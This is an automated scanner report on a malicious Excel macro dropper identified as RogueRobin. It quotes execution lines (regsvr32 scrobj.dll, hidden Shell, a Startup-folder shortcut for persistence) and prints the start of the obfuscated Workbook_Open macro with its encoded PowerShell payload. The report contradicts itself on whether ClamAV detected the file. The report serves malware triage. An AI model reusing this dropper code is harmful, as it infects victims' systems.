Verdict: MALICIOUS
Risk Score: 508
Heuristics: 10
- ClamAV: Doc.Dropper.RogueRobin-6826034-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.RogueRobin-6826034-0
- VBA project inside OOXML (medium, OOXML_VBA; 7 related findings). Document contains a VBA project — VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: Call Shell(final_command, vbHide)
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script: str = str + "tup\OneDrive.lnk"";$wshshell = New-Object -ComObject WScript.Shell;$link = $wshshell.CreateShortcut($p"
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched line in script: Dim powershell_command As String
- LOLBin reference in VBA (critical, OLE_VBA_LOLBIN). Matched line in script: final_command = "regsvr32.exe /s /n /u /i:" + sct_file_path + " scrobj.dll"
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: Set Oshell = CreateObject("WScript.Shell")
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script: Private Sub Workbook_Open()
- Suspicious extracted artifact (high, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 24345 bytes |

SHA-256: 84f295b51e92f1ff5a3a91bc4628bc14e9ca7ae41072beecd0db964e134c1d48

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 449 of 664 identifiers look randomly generated (e.g. 'aImhURPhJLSdZpjqcFC2phyX4zE1uY9iMAGes1ye'); 8 string-concatenation chain(s) — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub Jobs()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub New_Macro()
Dim str As String
str = str + "$content = ""H4sIAAAAAAAEAO19CXgcx3Fuz+zu7L3AYIkFQALEEiSoFYAFcZEEKFIULlKweIkAL4kSvFgsgRUXO+DsgiR0QJDkW"
str = str + "E/WYcl+dmLasiX5VC5L8RHHx/Od92zLseU4juOY9PliK7FiO4mdyIeYv6pnd2dBgJad5Ht+73uApqe6urq6urq6urqnQe294WHhEE"
str = str + "I48Vy8KMQHhPy5Rvzqn0U8ocYPhsR7vZ9f9wFlz+fXjU2nc9FZ05gyEzPRZCKbNfLRiVTUnMtG09no0P7R6IwxmWoPBn0bLB4HhoX"
str = str + "YozjEjF8/XuD7TdEk/EqHELPIeCTu2w8hieJ5zJKOYFXKLUTpjcqMF/y65neEqOT/Su/ii38eBt/9QvL9sGuZTn5MiABeRx8Uov4l"
str = str + "6KT4Ey2Kzj8e5K+15dvzqbN5vL+ftfo1W5LbxuLl7WbOTApLNsgoNDxmOd01+K/dTGWMpJSVZGZeZy+hG1gq5qceku9ruYpLfOAwm"
str = str + "tkihCL40V5KV+0/316oxWC0uWJQlrbgk3AD4JoHMeRKc8QE19knTC/SxrOxKpTEIKrWgrprOlzisMbt6rk4kL7cKiF8fjMI4kAk7G"
str = str + "5d53E3JhpvNaqBfjbsqfLEIoBiNUgCurvmaNitu1d3fm0BWGfMRxJAGl9wYR3yff8EvkSvLTQhyyWxOiRt/QvtRK+jyKxAUwtkV7H"
str = str + "VKOICMwwct0GJtsi1KYmtoewGyq4v57iWK8raDeW11xdqm60oMMDCF9e5fgnRdoPkDxG0jVxmgdTCYlF6yasZSc3RRXrZ+k3ZRl9n"
str = str + "IMIFkUXSwPl3vnjxYknysJe5hH26d4E6IZueXMDL6Y7w66E0q/rcxnpr9BYaqbVzTzTXLHgKOnuiuXZhLTJPNNd5nmhezSp8onkNa"
str = str + "/EJsgOf7EIttek731QUAqrSgrqXNei1qSOk+2y66Ph1evjpX168KBEXujee/1PkLIlL4rKsHrJJ30Il1VzQqchFwkSaw66wk+3N3E"
str = str + "rjtpYUpDGdAUY+s78o5R027HARO2XD7i9ir/eah8iwotQS28IljE8WiPv+AlPBa+YK9OY9JMjqUqXePwLBco239XrN+4gYfdUiBir"
str = str + "7jHXUzVWF0Y3PmW8AQdjv1f0Wt5qwq3V82Q5GlutKW7fX/CG10US1A3rAwNj6arvq9ECNsYFabCb6ZqWovJqwU2ON3tEJdrpmbKRO"
str = str + "1v/i4sVcK1lEUA9qd3RQkavtqB68jUDzJtQH6RUgrTFiBbasOjOnXNpFyVtWvo1g807Fknjb0z+/eFF39sGBi0tZ1jzYzIbd2P6oc"
str = str + "SXyzZFzVaEYvJFvY825qgoJWYz1kF5xNFxZVRlrXdKkveUYtKatVGi0FWq2vlx3xY/rznihz5fK9h9sQQ9ego9VUM1NssomNq6iml"
str = str + "71M6gpaOEll00FLpuKrZajQgXUhVVGvDAWMbg93/mrmB2Tleyvrd58BA3WlPUGHl/rDYBc6MEXNTSs5VDLl+sg89HxY+8FEp+uG11"
str = str + "k1nUki2500xCd/9wLFy+WZLi0hfO//wLFN/175Dp1BM8PsCAMqnKRq5RLnrgPfgADIJ7GG2KLGgv/E5eMiTaDeJ2Fp/XqES8vtbpq"
str = str + "vqdg8tLA/5AW1NWFRe+jCvnEGvPT/K41P8PvOvPz9I4YPSTyOdkjYzOtea3Xug0sw748HJ4S8BjwRj5N6rDdY/QWuu8x+mhKPEtKd"
str = str + "XA/zYsl+PxPMU3cxjaazU9d0N1zqKIEvW2a17gKuK/baVWzVS3rwD3UgbrLdqAgeNipO2Pbaeh3kDTXgREvLcbVSCKSP4sb20lYEv"
str = str + "lCk22wlqcQ57dCfNXcXyZXm6nW1MS8RF8yq6hpqMWeLOFz/sdu4vI/QWB+DgkLVSkW/KBSpfGYz65c+z1c+/ly3TxOuuE5UvmrdFT"
str = str + "DOgq7dFfNOROB7qyMEGrkgmV6HaXRuhZNEdniRvaGtecWr2Cg7txijIHV5xavZGDNucUWBurPLbbS+iaZNYDZIjnt87/USOpmR5nm"
str = str + "WrjPxjW8aDhW7PHHue7+srp9T/8a1qA52M9QMFbyL22rlrZzTCspUXfHqqmKR9d0T6yfF8QVJXxJtvNzF/XijnIN7FTNR4Dh5ciyA"
str = str + "7W4AmyTK4DDCkuXivv7zPCt5WppgHNo1B+slGphw1eoGuJsHynoQw5W0J1OQrYyss5Crl4AQ+cDGEcF0ZKFrF+AZTvjbl6+Wl3mR4"
str = str + "Hlfj7R3GCRrOWoelmSRq9F0+i7M1BqsdFfQAfuDNrQwQI6JCWvoDKI32qJ31hRIKjkGGm5NmNDKw7C+bNO0tgnyzW23fFr+0X7IN0"
str = str + "uBynszQ3TyxcJ+3vvJwfsH4bmBO2SEGmJ1+P5azw0PjfjeYsi3X0bSHsPET0ioHNsfMYuamTnNWXIYnttsr1FGlWEpd9w2EdYeo9e"
str = str + "13L8fqTYkdIAZDDhK1mDxeBTyjIM3l3OwGVn4FrC4J7lGGQLSB4u6XY8NYtkYK1ahN+6T9aSXHYsxyVWLkbALkZgiRi/EMsw+F4ZU"
str = str + "hqgxWAhWJgBFoMPLcfgHeKyI1NhG5mK8pFpzS5l1nV8GY3olkb0pRppbb+kfn0Jw55Wl5sISa/7sQX1637dS3va1p1T2H/wFNJ9xr"
str = str + "W0PI6s7LFeik+7QqEJ9Z1ynzZ5iQeDC0ZgXsTGJTZy7k6tpPtLimvO3ekuFpvP25Yldv3mP5e3qkViLyMvTRNWLivFDqocpm9UayK"
str = str + "8TJsXyePShGaPawadZdm6suxvrpwlCDpP6L9dHoMcwDOG521kSLazCoSDAuMmuqDWJlusF4SLSuCddZTj45h21cANeMrx9DPulU8B"
str = str + "H+5QBZY9OlvTVUcMr1afVnPUp6lsGl1qxKdq51r4zGNUnmMhhiQ9lC1O5jpnOSbi45x/ISQ3xfRimOdSZ+UCz0naIEe4TJjN4BCRQ"
str = str + "7GRXZc83nDSYQRBrrYIzxu2Y4mu5Anh4DejEYAu2QaGaharKOSg7WKAJg/nrkNbq63V0AO/rtLZAJ8DNNctOOgdQ/ztCy4QddsW83"
str = str + "7Qr7Ho7wyXlqYaVK5VqZKsvNpeObaXBBgy/wGVuQeXZ2P+0slrynKsvJaN+s1GF8ybNi7mdYC8cpPO+VLJjYAq1Ng+KtpPiDQQbkl"
str = str + "6gEzT5zZvc5VNE8Q1mFVa3MuBUNh14aTbfEKzSNzmPxbAsFPSwyz0Aljju6BvjPicbV6OdFG5/QK05tXiMvRtWdAKYy1Vgspa33fg"
str = str + "c9w8Wi26q0X0W4eWtCj+D4x+WJVzoNLav+x08KKpt/psRys1NDpuPjVr+z6/4lrNImHtG+s2f4Rx519UKZBj/7jJbR50i9lK4Wjzq"
str = str + "DGYpEYmG/FHAnyUZ53E/QgCRMJOWWcjnzR5yw+cwq7SgU1Yc8au58W+ymfeDO6xg6RxLnJXCR5rmfNUKbacV+X3xkaf/fCqjg+v5H"
str = str + "lVra7BMHQ3rEKHqazRvYjAdBdiLdjeWusgq9FrP8nigys6ybKdUDXqmIlhZ2k4dGej7+q1F+koik+lzkPx3gVa9Tnm4y6G/TV+jbN"
str = str + "HLd0d66qK+CVMi4h2DCQBVdP9xiihAoCO+pZVVnDtij20H9PVrahHKMCuSKjCrklSShBK0QMyy5oIhyLhCvZF4Uo9tPQkDbhKW+xf"
str = str + "sJQvkweuNE+4yybJmmWPn1w14YrW2V/jZKoWnN9Uzpl5tC17VhYB9YfLqR2gljPJgb7pFX0bMISevoEXL168UCN7sOSU44KQ6NI8o"
str = str + "7ODF2Av6xy8DljnBE7RKA/TdfPv0SbHBDKMLIbb5j+6rWM+X+GwlWlpLBvkWDIJebJ66cnMf+L8GmtE/GatB86YT/iCK/K43VPO42"
str = str + "6PnUfYaT4GhMZOLewy/xiZsKa6S1qKj6geW+4q1WvLxVXdacuuVXWXLVuh6lr54Lgv+CNItI2UYhPYIhT+OPM+kYgoWuGM5ZtQnPs"
str = str + "l6o63Bf7l7KPvOtDzwtPXD8hhft9TKOlE/jdUegDaaOKlhA9Ca3Y+C/HltJCuMix3S3QO6mm9Qnd6dY88J6XDvtolZ5thp+6BK/Ho"
str = str + "Hsmu6wuoELkcvb3UdnRI5w20lrfWHMM23KW7jTHCequ8/MUkrDHuEFOiXIavbl0rAFZA6w77zicxn+XGr4Tb71r+BLqvUS3TbLzSw"
str = str + "ce1svCtUDPbaNivFs6f6QSZjWPV0jawvGORCErthUC20smtFfVKpVeEKyNhvZc3HZW6fi5cpVdZ+4jPE64qUq4JvaqmHCH1Gtarap"
str = str + "cS1i1HuEoPM/varpAeNn9a6HhbQA5+qCYcbJ3WK/RwY2XssKCvVuX1K/QgBjyor5JcNnmteq3dqLTqV1TSkdIBaeVD6Z0h+CqbshF"
str = str + "56BUlZb4Z7shdFbRt1tx6qADY6E47aPzuK3rJg/J7QbWqV/N4NcvBCrjl4RvXk7N5lR1FrFqpyYXqMlyNo8xuih5929sUq6A0X7c9"
str = str + "vGSW+i43S3+FW4uoekQaXI1es4LB3aoWZu5q0CydULV6rTxDLAbjhCrMsTV6rb5myRyrY9whSVmzdP6ikVo+UkdhnQTq9NUSWO3Wa"
str = str + "wuDU1cAVpck/SJrpjSx7qKJZfPb9apeLz/QNOgN1meZ5fv8StR0F2mWfm4hYUq0N1ArvCDAr6+V/Bv1RvkBaOcPaHY1Ls/IfoBjfW"
str = str + "cJR+1D+xpymjzR10XCTXIQ1kfCG1qv1aP6hnPmL4rzypof6zA/qKSq2drPrtebl86S9XoT5keTvgHpBn1DXed79Ka4JpHuqqayubC"
str = str + "uAKwv9vfCjH06rXPr0ci5UuGBJZq8sHMpon0jr0XNNnQ5fE8RBrXQfS2FGILuRtyPNe/deNqLsbpD/FzwnQKd9eO79Eh7uc243y23"
str = str + "4/7cEaTYxx2lief0otIxQDJfY9xgg28swhHjuA1/UxE2m7y08bmZFDjO2JdTNzxGgjATSHyatR9Y56FbCWXINS+qzvE2D7uL4IVWJ"
str = str + "8BqBqMX6sNOZ7FE123hFjSktXgL8cFm8Y6/FfVyn+0QM/TBlPbPC3SCcUPj5I0nrZsDWma9VOmxa25IB9wRDwfMgSqVB7/KEZskub"
str = str + "0w5f81cGPQ3bjKSJEx3xR3e9WTR32tPryOxU6w7CC6degGn5aOTQl5vhBGXIcOCYT8emyaiMwFKMZvvsJb3HKbHyvBAc1Iky15zH8"
str = str + "hstYKj4XQzJ8RAuEP87wFE81fHOfYLTSWJ0kRGTJrVySstfZh/dbO0Qm7MUNIT5XnxUg9HaSRskyIZB1v+UDB+msN6RosX9Ox9D+U"
str = str + "7vqoudpXFIyPs/zchQA3F4z5yQ85G1dZ/lazHWZ7bWfYbtvRtcd2Rq07y06jVz7Vtp1NX+Zcu3RSveJBtP20Wh50WafcegFdJQ+4L"
str = str + "HTYnIAC5PLQslaNhekSCt6r5GUUijsPOfg+jU4bWHkHpcYKR5xyH9tNq1Zpn+qS9yk0dcXtqnYhKC9xhP3n/w3LTdnu1d1g38XV0i"
str = str + "6O9qK2Taq1qVtj7UzrbRvT0sUW3p1utF3z8Cy9rMICeEvbVTut7indBYl/XZQuaoS9upc1zcYiP++xZ1QvvE/3si/nj/K1pY/yVAU"
str = str + "drYCUG+X5h/+8isyaS/pZdplkRfVBDeW7VEshcme+dAeKyNK2A3XX+HvP0lF2oCQqXT2QdwikX85S1DFARJeg227Sg7Jn5i2+Am5k"
str = str + "2c1p97I3QBqWvS3ijgR7vy3IDgpNxgzivGlZznXLhtyPiOVjqrJdcmnfW19oiYeocNdB00Nwd7XlZYXbDxU+T6H3cusr71sFa2xD7"
str = str + "dTldoe9TlzXbedEfQFsoN1xhzeu8YC0eFp0P/lPhde7DtGwVwTl9/efi2sHFYbp/JQ+JwRL650/Euj9BlBuDwdaQW/j9LFhHx0l0R"
str = str + "mukNfd6Bs9PJigy4SvtNbSfdaHod5XC/LIps+6kOXrfYARLDcjWhc083SxuHVWkx8KZG5CM28tlY1p5kIpt0sz7y7lejXzlaVci8a"
str = str + "33axcvWa+qlQW0rAIFUMWHzZ/AY+bV8md1QjotRbSg6L8Cj10/EZ6eGipHl7js+vh9WV6OOez6+HNZXp4okwP7yjTw++X6eGPfXY9"
str = str + "/MlL1wMbmbwj6BQj8CEh6MMZjcKCOq1PERxt+dTIOb5hKC3v7YoV0vv5iDuA6dYGlMd7zrrlZZ0zys1Xd2z5y2J8sqA7ayLSsbhae"
str = str + "2KzZPin2Ntznci5Kq3kmZatpbtsFxaqNfP96L3ulEGU/NoU1sxPLEXaa8WNkrA1myZ0p/wC5fTrrmUvRS0SNVcpTcaNF1o2cs+5cO"
str = str + "VLmedpB+2tORr0erC5/Bzd2Sspqr1JLhzLVHfW3sD1W9wsXCxAZHIW8e0UWou1Sz6GtagYmtYbaFwopLF9bxvgZnW3pcZlVOheToV"
str = str + "2ZKEXXY+t1Dr5Io4rvUr7VqWlEG/Tt6EKiu1M0KpGTlgXXOi7zHXqki81vgteqViOVC1+QsRiwls4a79RxvL6MrWlXm98cCdIEW20"
str = str + "1mpu1V17Qy0f/TZWxvJ4vcldc9Tv1tCRb7NEmjFHfpjaJbcauCA8pXYPHCi1u1d+9/pPaFcLXHBtXCVbEsW2du0SrkrrnDOq0Gom9"
str = str + "NxpQacFZ2gUzhZB8y8wOOZ3aQWdLyER7M4u0MUWO3IVIVuWIKnmQms5sjFgdoDWuJV8wG3kA7QlzWhLWtCWMNeW8F2g2zZm3k+2cr"
str = str + "ugyPgOpG5Wt4n9lXVmvGSTy1a75IiAv0qXsosgcV5wbLwgins9+qlX5OOwfZehqCBc0CNHWz6WQpqh39LHOyCM+QnqDHFm32ks2DX"
str = str + "zJdLMnWS4VNn8F2QdZihgnZYyr0DzAl0z8hiLNFmajbtY+yAx7mZlurkgyAy8UgcbA7+5DsLOC76N/PEEEHx4S8mO/uqvyCZl/7/3"
str = str + "X9L/bdQt2WnzQIB08d6CLsxjQTHrMe75P6SEgg6+9jXwsnQAF0Z3EFeaSyt1foGuj6lmKlgY5VcUtSddhp9cBjXuvyDcNv2PjsLjW"
str = str + "23Tnrq6vO2COm+9vAjzl2q7INJtBZHMPwrS5GJl1/jhUyKWKEVZTpwo+ZSnZWwjZUEfiorQLpFLu7xclhwfKsjhx8CSdgIssEcObD"
str = str + "j0mw9ssKDa4AXhLfVHF697R8EfO8RHFP4upEfFHV/7Q1+N3zonuipUOhv6ig3OVZTgUGUJfp8N3qMXYL4+ihhlne6SF0hpiS7s83l"
str = str + "N7dRqOGACAd8M/cqFat3FV0PpdKCNvgLI26F/q5eOMSqqlr3+0QB0wGO+rWollVEcEtCyHt7T3VJo2vx6VZF10GsOhC9XPej2xn4H"
str = str + "72Llg+Fi5bDTUt4D4ZIyHgsvVcYGuzIQYiCgsHemXB9/uYI+5KdBi7iwf1ERYbe/iqYKwWml85zCMI3zo9bZUOPq2CtJ7g+GC/Fu7"
str = str + "F5q/L+RBcbuo6KvhOlAjUxSi70KaYOs8bVCjYD5U4C5+2luPUDJg9QbuprqIR1pc3SXslkjpWnNzJKUqBktNHbXrEK4t5qWHr10oC"
str = str + "YRwj7n7r9f6DT/16qxh6iLdBZ1RpV3WIof0c0bVskre7evklf23rRKXtn7BL9Xmz/i9xqzsprPKMwefjeYY/xea5rV8qu6+XsE8MU"
str = str + "6/pwXOScvc3BwSnc0Gtcu0ifzxugifSWvWaTzisiiu0jj4byXUzo6YktY9DMt3YJpnFwMciHdgyneOPxwtRS/QR5mmZ+oluL/OUtD"
str = str + "u4TSNVp5NUzebVmzSBdLzC+CbJGCUPO7BFUzVYSpajitLUpSV5SUVF049DB/agnws2opwIuWAGpE6k+j9yJ93zd9ABfpi4YZIYi+d"
str = str + "Zgxgtbae9QvJMO2iGQYi0iGHcyIdicv4cPpYlQU/ohm2b8yYmgD0zQX8xuL0BVFKFaErixCLUWotQiRY2aHvhgnkYobKp91xLNIfz"
str = str + "zVcrPKf0Gg2i7zOzhiHxh92YBiXb+iv3k73dPe0d7d0d3ZJ3iXm0H6GArWY0UMYBBegWf9aN5MZ6dyRPEwOt2DcVt/aFR8qkP+TeD"
str = str + "63YdGhvD+MvLPwObWD2To3FrIuS2UIzufULy00f6Z0k0LErU+LPjsWUA0gY4IdIvjOPqzOvq7glbB3675LoBilblsMN1Pk3+7mHbJ"
str = str + "3mjiYecpryZCLkpf59jpreC/MtDERxxb3ZoYclLazOlPOP04p1/j9MtM86TjIOrey6mH8T90fMClCc3/jKaJf/V3+Xxiu7/Wr4mva"
str = str + "s9oPtGhhYG5yR32aeIG5c2gfMRNlP/m6QLmmEo0f+Dbic6/x1fr94mvBD4C+hH3WUUTGQfJedZJbR3nFhPcYoWDODzF+J+4CL7oJj"
str = str + "5PBqitZgelX3ZTOsPtTgmiOaVSeo+fZBj2EZxRf4C+v8nzjBYS+9TnwXm3iKPd67kvzwQo3e/ZiVa+oRH8aj+34ibMlR6qu4XTFHP"
str = str + "ewv3VuBeHg6SBd7tOBDQx4CL8HW7C13hq/Z8T/bSbFj9gnh9TKI16n+G/h/wwj5O0vkrxJ1rQ38+5x2FEj2rPweo2iSjn5oU994qy"
str = str + "XHVA5po492arXqtwwB0T5/5irpNznbAvXXzRv9uhC497D+CnPJSedV0HzL2cftZN6ZMeSr8hqPRKdR/gr7kpfZf3eqTv9VPppzh9g"
str = str + "Cmf8hLPiEr0v1SI8tOC0qYAlX7JRfgLnN6mEeaoh0pznP6tn3i2+6n0i27m4yW4itPXaJR+iPm/O0DwKpbnHQrBb+H0n7ndf2BJ7m"
str = str + "WaRzi94KP0/Uyzn7n9iDHf5XSX/xDo/wClmvgCp4fEMYcmvo5eH4jS+Dwivqfd5FDEA1bupCfpUMX2K2Ru3FON3NFOmatwTzmcYtH"
str = str + "K/SKQBadfdMvcFdpph09MbpW5uOMOR1A81muVKXc7QuJdO2Xundp9jkrxsWtk7uPuXUpYbO+XuTXuteoq8bCV+yDntEGZ61EfdqwS"
str = str + "ISu3BrlqUWvl6pWHHRHxe7tkzuN52FEjHtstc3+Nslrx1LUy96j/dY46UXudzH048LCjXkxbuV+4HnY0iG9aud2uH4u1Ys8emfu5L"
str = str + "+loFP99r8zdH9glkNsnc3cjt0783n6ZS6G99WLVAZlzeu5wbBCPWbnnfA87msXs9TIXcycdG8XRUcq9Xvxvzq2iK7jilbUtmJcbRT"
str = str + "3nHqnt8FKZYG+o1b5WUBnnKv/cpQUedRRzwT9RB/h2laR8CpRXFssOagO2XEKr5LhGUs6AsrVYpgYHbLmaYCV7bEnZDMp4sfWbXJS"
str = str + "zSx0XbzlMuXvgzS8tI4/wMy+lX6Br2rBE9hEBjgv9BP+C4VV0xUL8IcUpwkPLiggplZWqeLWorHRYtbY4JJ7oDzBsBohmXiWae7nW"
str = str + "Z92U3hGg1Md/NS3rbmUZZnyUftJLtb7OnBu1UumfB0rpKT+18pxagn9XIXhJyrNIiSriPk3CJcxVWgluCzqxHrvgF93Yu3pFi1fBb"
str = str + "CUN1SH1YZRavOTRKO3jtJ/TEU6v5/QYpwmk1SLN8ClO5zn9MXN7gVNFIf5ehfB1SFeLNzD+DSIR2C6uVJ5zDYh1yr/4YMXKbcE9SI"
str = str + "3gfsYcQnrRe5zhBKdTolPp0AzAf+oZEPeJD2qnxV2COHQqj3lvE0+Kef/dSD+ovVL0KaPA9yuv8z0gHhdHfQ+LEeWD2utRd73/UXG"
str = str + "9stvxNqSy9b+Ebf6ZGID1HlNcjj8QCcj5FPa0Ld73I32TWon0PqxD96HkI8zhbwA7vd8RHxc3+b+P0tei7tPid5lmwvUDwgceEJ8R"
str = str + "O+GlTimf8f5YzKOtf0Xdv1N+Ccr9ikO5T7zgptKveD0KeLorlLuUzwYiCvU0hlLS0jplVrtb3KXc4W8H5rOBbUy5U3lEudK/S3mD8"
str = str + "nrXfmAu+nYqjytpJak8yT2iXkwpx5TD6MvTSkrcrVBP7wVltfYA0qTvL5FOuL6qPK28RZxXnuW2nhVvdD+v/JnydvT3z5RnPdVIBw"
str = str + "KUtrkofT1gauufQfNFXyXo7/M/gHRT4AXlM8qnlQHAH/W8oDwL3bpVGt+Q+jfKVd6w+rT4FDztI8pH1bXqOsXnOy6+pTwD+FvKRLB"
str = str + "LfU75nr9P/RvxpcBO9S5x0XtUvV6h9FnxuO8U0muVu8WPlW+LW9UfK9/1LqpPK9e4HgT8T67Xqo+w5I+IOd+71OdYn89hjP5YVdSE"
str = str + "8l5gZOnz3g+D/p3g8Jz4pEaln9Tei7oO5YtI7+K6H9TuVQjzVWB+KqiVtwiH4xFlSPM46tSfahVIv4pRfkTpD65VTynfDVQ71qlk1"
str = str + "bryObHGcaX6j8oGx13cogpf04NVpxNeQkX82YN0RPQBkxZXOTxiRlztuFLcLx50tgu/eIejXYTFu5GuEX+BdL34a6St4ntIuzm9it"
str = str + "NBxl8nnkc6ypgbOU0KF/icFJuQ5sR25wg4v96ZFLeJp5EmxfuR3gM4DfxbnPcw/h7gv4mU8G9lzFuB8bneyphPMuaT4rWix/VJ4Ae"
str = str + "QEv47jP8OU35HvFFkkBLeoRB+PadR5/3iFc5rnNS7RSdJ8hin33RS68JF6TVI3+XcKwYd+8Ww43o8o3gO4TmC5xiedeIT4jpY8Izy"
str = str + "GuVR5TvKRaVWbVKH1JvUSfW0+kr1Derj6qfVb6nfU59Xf6pqHI29X30CfjilUdoRfAI6b4IXV8UG+DpFNCNVxRXweQrWKLdwLtr+N"
str = str + "IR/gn5R+jdK8NPqCDNBOU7Gl+W4OtomCA/4e/HcKzYor8bzu/z+gmxk+9XJ8fGhdG42k5gfzCRyuZ6t4x1i+3QiO5lJmVdPjCM3fj"
str = str + "g/kdmdmO0e71yWvlOMDGfnZlJmYiKTenmnGBzdsP3q3vHxjJFMZHKdYswYyea7u4p8usa7xMiR3PTodCqTsYHdYmJLT5Gqc7xH1uz"
str = str + "cIqZS+fFDY7t6bYV9YvteY3Iuk7pazOVS/YNidyo/Nj+b2mUaM4N7RrEbu8WYQEpV+0cHR0bE6Hwun5ppH9kvhowz2YyRmBxK5BPi"
str = str + "0GwRnKRkJpc0zEx6gmrmsed7GTZyM4mpdLLAYNDIZFLJfNrI5tp3p7IpE0XUysgkvwbnTDOVzY9Nm6nEpOifBHZSlozk+vP5RHI6N"
str = str + "bkcq9HZVDKdyKRvRfGJdCY1np4Uc7MQKTV+guBZ00imcjkCk5k0WiBo9xySg2hozBjOosCYmcHICYzGRMoczxvjZwyTCDBcyZQYhE"
str = str + "j51Eg2l09kkZ1OT5jpSWgxJZIY8KnUOP0TO+KsfJmpGeN0anfCnEhMgTaRK4DpbC5l5gs56theyEVwyQrECNmIkWN4FFrEaxc6JQb"
str = str + "RVQPv9MysYeapJQyhyKdyRZgY7kvMpETODlBlzlDxrrlMppg5BGk4AwO41sjlS1QmtDSZmWcEazRLEJpJn0gnE6T18XwamCNmOp/a"
str = str + "k86mBBmQyFNSHCATMidm83N4p3PjpzFAk+NmCn2DFoTsJOqZ8wcSJgBoNm8x5MKRSQy5mZ6Yy1PXZ2Yhhck2AzJbEQ1jKTeUmpibm"
str = str + "iLVlVU+nM6ly3D9uVxqZiIzP5bOL4s2E5OpmYR5slQ0ljChmV0m9ADDOHlpHVLz4ZSZg24uLcTYnUhPzZmsukuLh1K5pJmeLS8cSp"
str = str + "1IzGXye1NkkDZBoOORSRgxhsKOlzriBg6mMomzDOXs5ex0Lm38gAnrSeaXE3p23kxPTS9bNDObyM6XCg7OZckgGJ9PT6Qz6bytNCe"
str = str + "NjV3V8NlUkvthDMzjNZ06S5NtgmAyvcOJzBxsKHEaPHkaiaF9oxDxFkz29tRZGGE6O35qLmXOj+cw4eFfztqzI9nJ1Nn9JwpGKF0J"
str = str + "JhEmWNJgwCqxBG63hoxKTsDlpuRplcibcwVwzLAAzBILsoTOlXIWODo3YUFnEmlygQLuXgJ7E/nkNKXTwpjLjx8gABx3GZnJlMk56"
str = str + "r40M87myrNUuieVnQJIvHcZ5iF44uRJQaWYgifZhbEDypQWBjFrnEmZEjwg/4kw6VChA26BAakTzMX0jDgIL2jMiAEDviaRhcDprO"
str = str + "ifnR0yZgiyuWkLMylfpjGXxfQ2JgCnc/2TGCbxMgNJDvwGjLPDpxOk56L6Uycs9y3IyfCol1y6VJYtvxvsZ235I6mJazGwKdOGGz6"
str = str + "bTPEUYiFH8wkzP5I9YVC3yfuXEDPz/ELvRzOp1KzIyRQPN0MOm4kB5qy3JTXUfEoMQi+mGJxGMjVpClomyBjkwiGuzednD6Zgkbm8"
str = str + "lFDAZlKJmYMyM5Y6m7dAa9WSBmB5LgA0pnjlE7mT18pQQlghBatyglSZJlWOJ41s3jSowJQNAgOrRn4gnYfHOY21Bplb0nl6wdefJ"
str = str + "gGMPWQRBR1lJxPm5LBpGiZbw8HUZNqEPstL5LI2nuJMIWDJA4b92nJZIz8OLVq5fozKaYbakzLlF6aH6J/IFTQ6lE5MZbH0pJO5pT"
str = str + "NzhLpizI5C7jQGcGlxYU0olksNYqrRspyTJoS3XBtzgp0EOc9cUV15ztFw9Gcy5I1ycv0p5tA/CchIh600JzAnc2L41BzchRjK5mh"
str = str + "hzmMKFCWkMYaBT81lEubw2VkseTRcuWUiFyH9ySj5iP2zEkUDw3YoQbKznBWVSIw0KwkftJZTO250Lkn2TsJbM9WaAWLkAGIqEqcg"
str = str + "yr5Uvn2U7C2f4+HvN6cwmlnkpiaNrrxIJMfzAGdg4AIxEfUUq7+YwgP/M4PX/glyzDYfbWMtuF+Yl0isiQR5saTR9B3kQEycSU2My"
str = str + "5gMHvp02jSy1L7dzYhk4Q01F8vI0IX07jxXhWXvsC0ER7bBHsNAU/hBcZKc6QdSpjVBefGwjMHyY3vSAPPMN8cwB8FSa5zvN83EPE"
str = str + "MZSmRcODqNRrGqWX7XykghYKvw92Xzbf9cfhao5SacVbQXC98++rcKbSYlZIzAIP87hlOT43NI5hhgaI55Spn2GUfS8ORnYN9TqbN"
str = str + "W99Bbysg1irwW1i64BO6Uvau7EjPpzLygCID7ZE26PQh7E+a87BnTH0EsBFZD3AkDyNxySFrwLkHal5IicuQABaLDcGzzhahUZozZ"
str = str + "cZ5yiCvE8MwsUvpx94s9+BWOLtr6YecsvO0iL87iEcG4OCQKOcU/LA7idz8e4d2HElkvgVxCyF/hSmAfLKqPY88dE8fFGeyNu8Ud4"
str = str + "kr6exC3xbWiySprlXhXO/3rAxXTqH9apMTLhCEmhDjULybxawKDmSW2CeLZipox7PATIi5OiH6ku0QH0j5xE1rqEG2iB61tA9wJuI"
str = str + "tblnAvw8rm5bkeB64Vsiz/FluXr9WDFtvBvRMttXOf7LWuhB6W1ovSgaN/CnnMKJQIRwe0nER/stBbir7+rRvk3BWgiIo5QFPIm9B"
str = str + "IQlC9dozDzeIkameI2hWkL/WOIB56g3t8TExzi9hRggNpNYf3BDApcItadVMohe5b7a2dQEmWa+XLeIyIIWq38Wb0bANTUf0hjNMZ"
